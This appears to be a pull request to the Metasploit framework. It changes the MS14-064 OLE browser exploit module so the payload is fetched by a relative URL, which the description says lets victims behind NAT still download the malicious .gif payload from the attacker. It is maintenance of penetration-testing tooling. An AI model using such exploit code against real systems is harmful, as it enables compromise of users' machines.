### PR TITLE
Use relative URL to GET payload for WinXP

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -277,10 +277,7 @@ end function
     vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
     gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
 
-    payload_src  = (datastore['SSL'] ? 'https' : 'http')
-    payload_src << '://'
-    payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
-    payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
+    payload_src = "#{gif_name}"
 
     # I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
     # with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.


### PR DESCRIPTION
Relative URLs are simpler, and allow the exploit to work on attack machines in NAT environments. 

Example: attack machine is NATed and does not have a DNS hostname. SRVHOST must be 0.0.0.0 but the victim cannot access the attacker from Rex::Socket.source_address. In this situation, a relative URL allows the victim to still GET the malicious .gif without needing the hostname at all because the victim is already knows the public hostname/IP of the attacker's machine.
